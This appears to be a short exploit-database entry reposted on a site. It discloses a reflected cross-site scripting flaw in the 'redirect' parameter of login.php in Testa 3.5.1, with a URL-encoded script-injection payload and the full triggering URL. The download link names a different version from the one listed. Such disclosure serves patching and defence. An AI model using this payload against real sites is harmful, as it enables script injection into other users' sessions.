# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS) # Date: 28/08/2022 # Exploit Author: Ashkan Moghaddas # Vendor Homepage: https://testa.cc # Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip # Version: 3.5.1 # Tested on: Windows/Linux # Proof of Concept: # 1- Install Testa 3.5.1 # 2- Go to https://localhost.com/login.php?redirect=XXXX # 3- Add payload to the Tab, the XSS Payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E # 4- XSS has been triggered. # Go to this url " https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E " XSS will trigger.
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
